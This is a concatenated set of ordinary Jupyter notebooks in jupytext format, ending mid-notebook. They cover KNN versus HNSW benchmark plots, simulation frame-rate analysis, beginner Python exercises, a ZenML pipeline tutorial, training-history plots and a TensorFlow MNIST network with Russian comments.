# Let's look at the benchmark results in the form of plots to appreciate the difference's magnitude truly. I'll use standard `matplotlib` code to plot these graphs. The X-axis is in `log` scale. The difference is spectacular! HNSW ANN knocks KNN out of the park in terms of time required to query `K=10` and `100` nearest neighbors. When the search space contains `~500K` products, searching for 100 nearest neighbors is 380X faster on ANN!!! At the same time, both KNN and ANN find 99.3% same nearest neighbors.
# + id="KPY1O5EaDzaO"
import pandas as pd
import matplotlib.pyplot as plt
# + id="SDlePIcuDzaP" outputId="d36d5740-61c1-4637-e552-d4d7bdfe8881"
metrics_df = pd.read_csv('data/metrics_df.csv')
metrics_df.head()
# + id="WnyBz4dkDzaQ" outputId="8f75b31e-db22-47fe-8ef7-d7f804ec6fa9"
k10_df = metrics_df[metrics_df['k']==10]
k100_df = metrics_df[metrics_df['k']==100]
fig = plt.figure(figsize=(12,5))
fig.patch.set_facecolor('white')
ax1 = fig.add_subplot(1,2,1)
ax1.plot(k10_df['products'].values, k10_df['knn_time'].values, label='KNN', linewidth=2, marker='o')
ax1.plot(k10_df['products'].values, k10_df['ann_time'].values, label='ANN', linewidth=2, marker='s')
ax1.set_xscale('log')
ax1.set_yscale('log')
ax1.set_ylim(0, 500000)
ax1.legend(fontsize=15)
ax1.set_title('K = 10', fontsize=15)
ax1.set_xlabel('Number of Products', fontsize=15)
ax1.set_ylabel('Query Time (s)', fontsize=15)
ax2 = fig.add_subplot(1,2,2)
ax2.plot(k100_df['products'].values, k100_df['knn_time'].values, label='KNN', linewidth=2, marker='o')
ax2.plot(k100_df['products'].values, k100_df['ann_time'].values, label='ANN', linewidth=2, marker='s')
ax2.set_xscale('log')
ax2.set_yscale('log')
ax2.set_ylim(0, 500000)
ax2.legend(fontsize=15)
ax2.set_title('K = 100', fontsize=15)
ax2.set_xlabel('Number of Products', fontsize=15)
plt.suptitle('Nearest Neighbors Query Time (s)', fontsize=15);
# + id="jEnRKB8ADzaW" outputId="9df32220-3dac-4f07-fb4e-6a5f91f09c38"
fig = plt.figure(figsize=(10,5))
fig.patch.set_facecolor('white')
plt.plot(k10_df['products'].values, k10_df['pct_overlap'].values, label='K=10', linewidth=2, marker='o')
plt.plot(k100_df['products'].values, k100_df['pct_overlap'].values, label='K=100', linewidth=2, marker='s')
plt.title('Nearest Neighbors Overlap Ratio between KNN and HNSW ANN', fontsize=15)
plt.xlabel('Number of Products', fontsize=15)
plt.ylabel('Nearest Neighbors Overlap Ratio', fontsize=15)
plt.legend(fontsize=15)
plt.xscale('log')
# + [markdown] id="BxsyJxU0DzaY"
# With these results, I think it's safe to say, "KNN is dead!", there is no reasonable reason to use `sklearn's` KNN anymore. I hope you found this post useful! Thank you for reading!
| knn_is_dead.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
import numpy as np
import os,sys,time
import matplotlib.pyplot as plt
# +
root_dir='/esat/opal/kkelchte/docker_home/tensorflow/log'
data_dir='/esat/opal/kkelchte/docker_home/pilot_data'
##### 20FPS
# log_dirs=sorted([root_dir+'/'+d for d in os.listdir(root_dir) if d.startswith('rec_') and not '_10_' in d])
# data_dirs=sorted([data_dir+'/'+d for d in os.listdir(data_dir) if d.startswith('rec_') and not '_10_' in d])
# log_dirs=[l for dd in data_dirs for l in log_dirs if os.path.basename(l) in dd ]
# log_dirs = log_dirs[1:]
# print "log_dirs: "
# for ld in log_dirs: print ld
# print "data_dirs: "
# for dd in data_dirs: print dd
##### 10FPS
# log_dirs=sorted([root_dir+'/'+d for d in os.listdir(root_dir) if d.startswith('rec_10_')])
# data_dirs=sorted([data_dir+'/'+d for d in os.listdir(data_dir) if d.startswith('rec_10_')])
# log_dirs=[l for dd in data_dirs for l in log_dirs if os.path.basename(l) in dd ]
# print "log_dirs: "
# for ld in log_dirs: print ld
# print "data_dirs: "
# for dd in data_dirs: print dd
##### 20FPS
log_dirs=sorted([root_dir+'/'+d for d in os.listdir(root_dir) if d.startswith('rec_20_')])
data_dirs=sorted([data_dir+'/'+d for d in os.listdir(data_dir) if d.startswith('rec_20_')])
log_dirs=[l for dd in data_dirs for l in log_dirs if os.path.basename(l) in dd ]
print "log_dirs: "
for ld in log_dirs: print ld
print "data_dirs: "
for dd in data_dirs: print dd
assert len(log_dirs) == len(data_dirs)
# -
# extract frame rates for each run of each log dir
results={}
for index,dd in enumerate(data_dirs):
print os.path.basename(dd)
# extract hosts:
import subprocess, shlex
log_files=[log_dirs[index]+'/condor/'+f for f in os.listdir(log_dirs[index]+'/condor/') if f.endswith('log')]
host_list=[l.split(' ')[8].split(':')[0][1:] for l in open(log_files[0],'r').readlines() if 'executing on host' in l]
host_names=[]
for host in host_list: host_names.append(subprocess.check_output(shlex.split('host '+host)).split(' ')[4].split('.')[0])
for h in host_names: print h
image_files=sorted([dd+'/'+d+'/images.txt' for d in os.listdir(dd) if os.path.isdir(dd+'/'+d) and d.startswith('0')])
mean={'canyon':[],'forest':[],'sandbox':[],'total':[]}
var={'canyon':[],'forest':[],'sandbox':[],'total':[]}
for i_f in image_files:
try:
# i_f=image_files[0]
# print(i_f)
time_stamps= [ float(l.split(' ')[0].split(':')[0][:-1])+float(l.split(' ')[0].split(':')[1][:-2])*10**-9 for l in open(i_f,'r').readlines() if 'RGB' in l]
frame_rates = [1/(time_stamps[i+1]-time_stamps[i]+0.01) if time_stamps[i] != time_stamps[i+1] else np.nan for i in range(len(time_stamps)-1)]
if 'canyon' in i_f:
mean['canyon'].append(np.nanmean(frame_rates))
var['canyon'].append(np.nanvar(frame_rates))
elif 'sandbox' in i_f:
mean['sandbox'].append(np.nanmean(frame_rates))
var['sandbox'].append(np.nanvar(frame_rates))
elif 'forest' in i_f:
mean['forest'].append(np.nanmean(frame_rates))
var['forest'].append(np.nanvar(frame_rates))
mean['total'].append(np.nanmean(frame_rates))
var['total'].append(np.nanvar(frame_rates))
# plt.subplot(1,2,1)
# plt.hist(frame_rates)
# plt.subplot(1,2,2)
# plt.plot(frame_rates)
# plt.show()
except:
pass
results[os.path.basename(dd)]={'machines': host_names, 'mean':mean, 'var': var}
# Print results in md table format
msg=""
for r in sorted(results.keys()):
# print r
msg="{0} | {1} ".format(msg, results[r]['machines'][0])
print msg,"| "
for w in "canyon", "forest", "sandbox", "total":
msg=w+" "
for r in sorted(results.keys()):
# print r
msg="{0} | {1:0.2f} ({2:0.2f}) ".format(msg, np.nanmean(results[r]['mean'][w]), np.nanmean(results[r]['var'][w]))
print msg,"| "
# +
for i,w in enumerate(["canyon", "forest", "sandbox", "total"]):
plt.figure(figsize=(15,20))
plt.subplot(8,2,i*2+1)
plt.ylim=(0,40)
plt.bar([results[r]['machines'][0] for r in sorted(results.keys())],
[np.mean(results[r]['mean'][w]) for r in sorted(results.keys())])
plt.subplot(8,2,i*2+2)
plt.ylim=(0,500)
plt.bar([results[r]['machines'][0] for r in sorted(results.keys())],
[np.mean(results[r]['var'][w]) for r in sorted(results.keys())])
plt.show()
# -
results={}
# Extract frame rate by counting the average number of images saved for each environment
for index,dd in enumerate(data_dirs):
print os.path.basename(dd)
# extract hosts:
import subprocess, shlex
log_files=[log_dirs[index]+'/condor/'+f for f in os.listdir(log_dirs[index]+'/condor/') if f.endswith('log')]
host_list=[l.split(' ')[8].split(':')[0][1:] for l in open(log_files[0],'r').readlines() if 'executing on host' in l]
host_names=[]
for host in host_list: host_names.append(subprocess.check_output(shlex.split('host '+host)).split(' ')[4].split('.')[0])
for h in host_names: print h
mean={'canyon':[],'forest':[],'sandbox':[]}
# duration={'canyon':[],'forest':[],'sandbox':[]}
run_dirs=[dd+'/'+rd for rd in os.listdir(dd) if rd.startswith('0')]
for rd in run_dirs:
try:
begin=os.path.getmtime(rd+'/RGB/'+sorted(os.listdir(rd+'/RGB'))[0])
end=os.path.getmtime(rd+'/RGB/'+sorted(os.listdir(rd+'/RGB'))[-1])
if 'canyon' in rd:
mean['canyon'].append(len(os.listdir(rd+'/RGB'))/(end-begin))
# duration['canyon'].append(end-begin)
elif 'sandbox' in rd:
mean['sandbox'].append(len(os.listdir(rd+'/RGB'))/(end-begin))
# duration['sandbox'].append(end-begin)
elif 'forest' in rd:
mean['forest'].append(len(os.listdir(rd+'/RGB'))/(end-begin))
# duration['forest'].append(end-begin)
except:
pass
results[os.path.basename(dd)]={'machines': host_names, 'mean':mean}
# print result table wise
# Print results in md table format
msg="| "
for r in sorted(results.keys()):
# print r
msg="{0} | {1} ".format(msg, results[r]['machines'][0])
print msg,"| "
for w in "canyon", "forest", "sandbox":
msg="| "+w+" "
for r in sorted(results.keys()):
# print r
msg="{0} | {1:0.2f} ({2:0.2f}) ".format(msg, np.mean(results[r]['mean'][w]), np.var(results[r]['mean'][w]))
print msg,"| "
| scripts/examin_framerates.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# +
#Write a Python Program to Find the Factorial of a Number?
num = int(input("Enter a Number to find factorial : "))
factorial = 1
if num < 0:
print("Can not calculate Factorial of a negative number")
elif num == 0:
print("Factorial of zero is 1")
else:
for i in range(1,num+1):
factorial = factorial * i
print("Factorial of {} is {}".format(num, factorial))
# +
#2. Write a Python Program to Display the multiplication Table?
num = int(input("Enter a Number to find table : "))
for i in range(1,11):
print("{} X {} = {}".format(num,i,i*num))
# +
#3. Write a Python Program to Print the Fibonacci sequence?
sequence = int(input("enter a number to find the fibonacci series : "))
count = 0
a , b = 0,1
if sequence <= 0:
print("Please enter a positive number")
elif sequence == 1:
print("Fibonacci series upto ",sequence, ":")
print(a)
else:
print("Fibonacci series upto ",sequence, ":")
while count <= sequence:
print(a, end=" ")
c = a + b
a,b = b, c
count+=1
# +
#4. Write a Python Program to Check Armstrong Number?
num = int(input("Enter the number : "))
power = len(str(num))
temp = num
sum = 0
while temp > 0:
digit = temp % 10
sum = sum + digit ** power
temp = temp//10
if num == sum :
print("Number is armstrong number")
else:
print("Not an armstrong number")
# +
#5. Write a Python Program to Find Armstrong Number in an Interval?
low = int(input("Lower limit : "))
up = int(input("Upper limit : "))
for num in range(low,up+1):
power = len(str(num))
temp = num
sum = 0
while temp > 0:
digit = temp % 10
sum = sum + digit ** power
temp = temp//10
if num == sum :
print(num)
# -
#6. Write a Python Program to Find the Sum of Natural Numbers?
num = int(input("enter the number : "))
sum = 0
for i in range(0,num+1):
sum+=i
print("Sum of natural numbers upto {} is {}".format(num,sum))
| Programming_Assingment_4.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import os
import pandas as pd
import matplotlib.pyplot as plt
from scipy.stats import boxcox
# Get File Directory
WORK_DIR = os.getcwd()
# Loading the json data as python dictionary
DATA = pd.read_csv(WORK_DIR + "/daily_orders.csv")
DATA.date = pd.to_datetime(DATA['date'], format='%Y-%m-%d %H:%M:%S')
DATA['boxcox'], lam = boxcox(DATA['value'])
# inplace is mandatory here. Have to assign back to dataframe
# (because it is a new copy)
DATA.set_index('date', inplace=True)
# Print DATA
DATA.plot(subplots=True, layout=(2, 1), figsize=(9, 9))
plt.show()
| notebooks/Current.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.6
# language: python
# name: python3
# ---
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
# # Training history analysis
#
# ## baseB+
#
# * weight initialization = imagenet
# * batch size = 64
# * training instances = 40k (balanced)
# * validation instances = ~5k (baleanced)
# * epochs = 15 (w/ early stopping)
# * performance on test set = 0.9212
#
# January, 31th
df_92 = pd.read_csv('Colab_92acc_finetuning.csv')
df_92.index += 1
df_92.head()
plt.plot(df_92['loss'])
plt.plot(df_92['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'valid'], loc='upper left')
plt.show()
plt.plot(df_92['acc'])
plt.plot(df_92['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'valid'], loc='upper left')
plt.show()
# ## baseB
#
# * weight initialization = random
# * batch size = 64
# * training instances = 40k (balanced)
# * validation instances = ~5k (baleanced)
# * epochs = 15 (w/ early stopping)
# * performance on test set = 0.9089
#
# January, 30th
df_base = pd.read_csv('Colab_91acc.csv')
df_base.index += 1
df_base.head()
plt.plot(df_base['loss'])
plt.plot(df_base['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'valid'], loc='upper left')
plt.show()
plt.plot(df_base['acc'])
plt.plot(df_base['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'valid'], loc='upper left')
plt.show()
# ## Naive-Pruned Model
#
# * weight initialization = imagenet
# * batch size = 64
# * training instances = 56k
# * validation instances = 7k
# * epochs = 15 (w/ early stopping)
# * performance on balanced test set = 0.9194
#
# February, 20th
df_prun = pd.read_csv('Colab_91acc_pruned.csv')
df_prun.index += 1
df_prun.head()
plt.plot(df_prun['loss'])
plt.plot(df_prun['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'valid'], loc='upper left')
plt.show()
plt.plot(df_prun['acc'])
plt.plot(df_prun['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'valid'], loc='upper left')
plt.show()
| transfer/plots/Plots.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.9.7 ('food')
# language: python
# name: python3
# ---
# %load_ext autoreload
# %autoreload 2
# +
from food.tools import *
from food.paths import *
from food.psql import *
import pandas as pd
import numpy as np
import food.custom_pandas as cpd
from tqdm import tqdm
import requests
# # !nbdev_build_lib
# -
# search best match of food classes to images (5)
#
# - request glovo api for best match
# - create sql table corresponding photo_clips
# - save clips to sql table
# +
query = f"""select f.id, f.text, f.description from food.foods_prompted f
left join food.foods_prompted_images i on (f.id = i.food_id)
where i.clip is null"""
bs = 1
total = engine.execute(f'select count(*) from ({query}) a').one()
pd_iter = cpd.read_sql_query(query, engine, chunksize=1, index_col='id')
for df in tqdm(pd_iter, desc=f"clip image inference {schema}", total=total[0] // bs):
food_id = df.iloc[0].name
text = df.iloc[0]['text']
description = df.iloc[0]['description']
url = f"http://localhost:8184/search"
r_df = pd.read_json(requests.post(url,params={'text':text,'topk':5,'return_clip':True}).json())[['country_code','store_name','product_name','path','accuracy','clip']]
r_df['food_id'] = food_id
r_df.to_sql('foods_prompted_images', engine, if_exists='append',schema=schema,index=False)
# -
#
| classifying_glovo_images.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Creating your first pipeline
# This is the notebook version of our [Quickstart](../getting-started/quickstart.md)! Our goal here is to help you to get the first practical experience with our tool and give you a brief overview on some basic functionalities of **ZenML**.
#
# In this example, we will create and run a simple pipeline featuring a local CSV dataset and a basic feedforward neural network and run it in our local environment. If you want to run this notebook in an interactive environment, feel free to [run it in a Google Colab](https://colab.research.google.com/github/maiot-io/zenml/blob/main/docs/book/tutorials/simple-classification.ipynb)
# ## First things first...
# You can install **ZenML** through:
#
# ```
# pip install zenml
# ```
#
# Once the installation is completed, you can go ahead and create your first **ZenML** repository for your project. As **ZenML** repositories are built on top of Git repositories, you can create yours in a desired empty directory through:
#
# ```
# git init
# zenml init
# ```
#
# Now, the setup is completed. For the next steps, just make sure that you are executing the code within your **ZenML** repository.
# ## Creating the pipeline
# Once you set everything up, we can start our tutorial. The first step is to create an instance of a pipeline. **ZenML** comes equipped with different types of pipelines, but for this example we will be using the most classic one, namely a `TrainingPipeline`.
#
# While creating your pipeline, you can give it a name and use that name to reference the pipeline later.
# +
from zenml.pipelines import TrainingPipeline
training_pipeline = TrainingPipeline(name='QuickstartPipeline')
# -
# In a **ZenML** `TrainingPipeline`, there is a fixed set of steps representing the processes, which can be found in any machine learning workflow. These steps include:
#
# 1. **Split**: responsible for splitting your dataset into smaller datasets such as train, eval, etc.
# 2. **Transform**: responsible for the preprocessing of your data
# 3. **Train**: responsible for the model creation and training process
# 4. **Evaluate**: responsible for the evaluation of your results
# ## Creating a datasource
# However, before we dive into the aforementioned steps, let's briefly talk about our dataset.
#
# For this quickstart, we will be using the *Pima Indians Diabetes Dataset* and on it, we will train a model which will aim to predict whether a person has diabetes based on diagnostic measures.
#
# In order to be able to use this dataset (which is currently in CSV format) in your **ZenML** pipeline, we first need to create a `datasource`. **ZenML** has built-in support for various types of datasources and for this example you can use the `CSVDatasource`. All you need to provide is a `name` for the datasource and the `path` to the CSV file.
# +
from zenml.datasources import CSVDatasource
ds = CSVDatasource(name='Pima Indians Diabetes Dataset',
path='gs://zenml_quickstart/diabetes.csv')
# -
# Once you are through, you will have created a tracked and versioned datasource and you can use this datasource in any pipeline. Go ahead and add it to your pipeline.
training_pipeline.add_datasource(ds)
# ## Configuring the split
# Now, let us get back to the **four** essential steps where the first step is the **Split**.
#
# For the sake of simplicity in this tutorial, we will be using a completely random `70-30` split into a train and evaluation dataset.
# +
from zenml.steps.split import RandomSplit
training_pipeline.add_split(RandomSplit(split_map={'train': 0.7,
'eval': 0.3}))
# -
# Keep in mind, in a more complicated example, it might be necessary to apply a different splitting strategy. For these cases, you can use the other built-in split configuration **ZenML** offers or even implement your own custom logic into the split step.
# ## Handling data preprocessing
# The next step is to configure the step **Transform**, the data preprocessing.
#
# For this example, we will use the built-in `StandardPreprocesser`. It handles the feature selection and has sane defaults of preprocessing behaviour for each data type, such as stardardization for numerical features or vocabularization for non-numerical features.
#
# In order to use it, you need to provide a list of feature names and a list of label names. Moreover, if you do not want it use the default transformation for a feature or you want to overwrite it with a different preprocessing method, this is also possible as we do in this example.
# +
from zenml.steps.preprocesser import StandardPreprocesser
training_pipeline.add_preprocesser(
StandardPreprocesser(
features=['times_pregnant',
'pgc',
'dbp',
'tst',
'insulin',
'bmi',
'pedigree',
'age'],
labels=['has_diabetes'],
overwrite={'has_diabetes': {
'transform': [{'method': 'no_transform',
'parameters': {}}]}}))
# -
# Much like the splitting process, you might want to work on cases, where the capabilities of the `StandardPreprocesser` do not match your task at hand. In this case, you can create your own custom preprocessing step, but we will go into that topic in a different tutorial.
# ## Training your model
# As the data is now ready, we can move onto the step **Train**, the model creation and training.
#
# For this quickstart, we will be using the simple built-in `FeedForwardTrainer` step and as the name suggests, it represents a feedforward neural network, which is configurable through a set of variables.
# +
from zenml.steps.trainer import TFFeedForwardTrainer
training_pipeline.add_trainer(TFFeedForwardTrainer(loss='binary_crossentropy',
last_activation='sigmoid',
output_units=1,
metrics=['accuracy'],
epochs=20))
# -
# Of course, not every single machine learning problem is solvable by a simple feedforward neural network and most of the time, they will require a model which is tailored to the corresponding problem. That is why we created an interface where the users can implement their own custom models and integrate it in a trainer step. However this approach is not within the scope of this tutorial and you can learn more about it in our docs and the upcoming tutorials.
# ## Evaluation of the results
# The last step to configure in our pipeline is the **Evaluate**.
#
# For this example, we will be using the built-in `TFMAEvaluator` which uses [Tensorflow Model Analysis](https://www.tensorflow.org/tfx/model_analysis/get_started) to compute metrics based on your results (possibly within slices).
# +
from zenml.steps.evaluator import TFMAEvaluator
training_pipeline.add_evaluator(
TFMAEvaluator(slices=[['has_diabetes']],
metrics={'has_diabetes': ['binary_crossentropy',
'binary_accuracy']}))
# -
# ## Running your pipeline
# Now that everything is set, go ahead and run the pipeline, thus your steps.
training_pipeline.run()
# With the execution of the pipeline, you should see the logs informing you about each step along the way. In more detail, you should first see that your dataset will is ingested through the component *DataGen* and then split by the component *SplitGen*. Afterwards data preprocessing will take place with the component *Transform* and will lead to the main training component *Trainer*. Ultimately, the results will be evaluated by the component *Evaluator*.
# ## Post-training functionalities
# Once the training pipeline is finished, you can check the outputs of your pipeline in different ways.
# ### Dataset
# As the data is now ingested, you can go ahead and take a peek into your dataset. You can achieve this by simply getting the datasources registered to your repository and calling the method `sample_data`.
# +
from zenml.repo import Repository
repo = Repository.get_instance()
datasources = repo.get_datasources()
datasources[0].sample_data()
# -
# ### Statistics
# Furthermore, you can check the statistics which are yielded by your datasource and split configuration through the method `view_statistics`. By using the `magic` flag, we can even achieve this right here in this notebook.
training_pipeline.view_statistics(magic=True)
# ### Evaluate
# On the other hand, if you want to evalaute the results of your training process you can use the `evaluate` method of your pipeline.
#
# Much like the `view_statistics`, if you execute `evaluate` with the `magic` flag, it will help you continue in this notebook and generate two new cells, each set up with a different evaluation tool:
#
# 1. **Tensorboard** can help you to understand the behaviour of your model during the training session
# 2. **TFMA** or **tensorflow_model_analysis** can help you assess your already trained model based on given metrics and slices on the evaluation dataset
#
# *Note*: if you want to see the sliced results, comment in the last line and adjust it according to the slicing column. In the end it should look like this:
# ```
# tfma.view.render_slicing_metrics(evaluation, slicing_column='has_diabetes')
# ```
training_pipeline.evaluate(magic=True)
# ... and this it it for the quickstart. If you came here without a hiccup, you must have successly installed ZenML, set up a ZenML repo, registered a new datasource, configured a training pipeline, executed it locally and evaluated the results. And, this is just the tip of the iceberg on the capabilities of **ZenML**.
#
# However, if you had a hiccup or you have some suggestions/questions regarding our framework, you can always check our [docs](https://docs.zenml.io/) or our [github](https://github.com/maiot-io/zenml) or even better join us on our [Slack](https://zenml.io/slack-invite) channel.
#
# Cheers!
| docs/book/tutorials/creating-first-pipeline.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:Py3Env]
# language: python
# name: conda-env-Py3Env-py
# ---
# ### Graphs
#
steering_values_100_file = open("../data/steering_vals_100.txt", "r")
steering_values_500_file = open("../data/steering_vals_500.txt", "r")
steering_values_600_file = open("../data/steering_vals_600.txt", "r")
steering_values_700_file = open("../data/steering_vals_700.txt", "r")
steering_values_100 = steering_values_100_file.readlines()
steering_values_500 = steering_values_500_file.readlines()
steering_values_600 = steering_values_600_file.readlines()
steering_values_700 = steering_values_700_file.readlines()
print(len(steering_values_100))
print(len(steering_values_500))
print(len(steering_values_600))
print(len(steering_values_700))
# +
import plotly.offline as py
import plotly.graph_objs as go
import plotly
py.init_notebook_mode(connected=True)
x = list(range(1, len(steering_values_100)))
y = steering_values_100
plotly.offline.iplot({
"data": [go.Scatter(x= x, y= y)],
"layout": go.Layout(title="Steering values with 100 penlty")
})
# +
import plotly.offline as py
import plotly.graph_objs as go
import plotly
py.init_notebook_mode(connected=True)
x = list(range(1, len(steering_values_500)))
y = steering_values_500
plotly.offline.iplot({
"data": [go.Scatter(x= x, y= y)],
"layout": go.Layout(title="Steering values with 500 penlty")
})
# +
import plotly.offline as py
import plotly.graph_objs as go
import plotly
py.init_notebook_mode(connected=True)
x = list(range(1, len(steering_values_600)))
y = steering_values_600
plotly.offline.iplot({
"data": [go.Scatter(x= x, y= y)],
"layout": go.Layout(title="Steering values with 600 penlty")
})
# +
import plotly.offline as py
import plotly.graph_objs as go
import plotly
py.init_notebook_mode(connected=True)
x = list(range(1, len(steering_values_700)))
y = steering_values_700
plotly.offline.iplot({
"data": [go.Scatter(x= x, y= y)],
"layout": go.Layout(title="Steering values with 700 penlty")
})
# -
| src/Visualization.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + pycharm={"name": "#%%\n"}
import os
from tensorflow.python.keras.utils.np_utils import to_categorical
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import tensorflow as tf
# mnist находится внутри keras, а он уже есть в tensorflow
from keras.datasets import mnist
import matplotlib.pyplot as plt
print(tf.__version__)
# + pycharm={"name": "#%%\n"}
# Загружаем обучающий и тестовый наборы с помощью функции load_data():
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# + pycharm={"name": "#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n"}
# Посмотрим, сколько загрузилось данных
print("В обучающей выборке образов x:", len(x_train), "целевых значений y:", len(y_train))
print("В тестовой выборке образов x:", len(x_test), "целевых значений y:", len(y_test))
# + pycharm={"name": "#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n"}
# Посмотрим, что внутри обучающих данных:
n1 = 5555 # выбрали номер от 0 до 60000
plt.imshow((255 - x_train[n1]), cmap="gray")
print(x_train[n1])
# + pycharm={"name": "#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n"}
# приводим оттенки серого 0..255 к диапазону 0..1
x_train = x_train / 255
x_test = x_test / 255
print("Размер обучающих данных: ", tf.shape(x_train).numpy())
# + pycharm={"name": "#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n"}
# выпрямляем массив, чтобы он сих квадратного превратился в линейный
# [-1, 28*28] означает что, матрица 28 на 28 выпрямляется в массив размером
# 28*28 штук, а перзмерность по первой оси, где стоит -1 вычисляется
# автоматически
x_train = tf.reshape(tf.cast(x_train, tf.float32), [-1, 28 * 28])
x_test = tf.reshape(tf.cast(x_test, tf.float32), [-1, 28 * 28])
print("Новый размер: ", tf.shape(x_train).numpy())
# + pycharm={"name": "#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n"}
# переделываем целевые значения
# y_train[i] -- это цифра, подлежащая различению, например 3
# Превратим её в массив [0 0 0 1 0 0 0 0 0 0]
# здесь 1 стоит на 3 месте. Это и есть целевые выходы
# нейронов последнего слоя, чтобы именно нейрон с номером 3
# откликался на изображение цифры 3
# Для такого преобразования есть специальная функция to_categorical
# Такой формат называется вектор One-hot
print("Целевое значение до преобразования:", y_train[n1])
# + pycharm={"name": "#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n"}
y_train = to_categorical(y_train, 10)
# + pycharm={"name": "#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n"}
print("Целевое значение после преобразования:", y_train[n1])
# + pycharm={"name": "#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n"}
# Создаём модель слоя
class DenseNN(tf.Module):
# Конструктор. Заполняет начальные значения
def __init__(self, outputs, activate="relu"):
super().__init__()
self.outputs = outputs # количество выходов = количеству нейронов в слое
self.activate = activate # тип активационной функции (по умолчанию relu)
self.fl_init = False # становится true после первой инициализации весов
# Функция для расчёта выходных величин сети
def __call__(self, x):
if not self.fl_init: # если весов ещё нет, создаём их случайными
self.w = tf.random.truncated_normal((x.shape[-1], self.outputs), stddev=0.1, name="w")
self.b = tf.zeros([self.outputs], dtype=tf.float32, name="b")
# Размер тензора w: (x.shape[-1], self.outputs)
# здесь x.shape[-1] - размер вектора входных данных,
# то есть, сколько входов в первый раз подпдим на сеть,
# столько весов к каждому нейрону и сформируется
# следовательно, первый индекс - номер входа нейрона
# второй размер self.outputs совпадает с кличеством выходов
# и с количествот нейронов в слое, значит второй
# индекс - номер нейрона
# stddev=0.1 - среднеквадратическое отклонение
# преобразуем w и b в тензоры
self.w = tf.Variable(self.w)
self.b = tf.Variable(self.b)
self.fl_init = True
# матричное вычисление выхода слоя
y = x @ self.w + self.b
if self.activate == "relu":
return tf.nn.relu(y)
elif self.activate == "softmax":
return tf.nn.softmax(y)
return y
# + pycharm={"name": "#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n"}
# создадим два полносвязных слоя со 128 нейронами и 10
layer_1 = DenseNN(128)
layer_2 = DenseNN(10, activate="softmax")
# + pycharm={"name": "#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n"}
# Функция расчёта значений на выходе сети
def model_predict(x):
y = layer_1(x)
y = layer_2(y)
return y # layer_2(layer_1(x))
# + pycharm={"name": "#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n"}
# Задание функции потерь
cross_entropy = lambda y_true, y_pred: tf.reduce_mean(tf.losses.categorical_crossentropy(y_true, y_pred))
# y_true, y_pred – это наборы one-hot векторов размером мини-батча
# + pycharm={"name": "#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n"}
# определим оптимизатор для градиентного спуска
opt = tf.optimizers.Adam(learning_rate=0.001)
# opt = tf.optimizers.SGD(learning_rate=0.02)
# opt = tf.optimizers.SGD(momentum=0.5, learning_rate=0.02) # Метод моментов
# opt = tf.optimizers.SGD(momentum=0.5, nesterov=True, learning_rate=0.02) # Метод Нестерова
# opt = tf.optimizers.Adagrad(learning_rate=0.1) # Adagrad
# opt = tf.optimizers.Adadelta(learning_rate=1.0) # Adadelta
# opt = tf.optimizers.RMSprop(learning_rate=0.01)
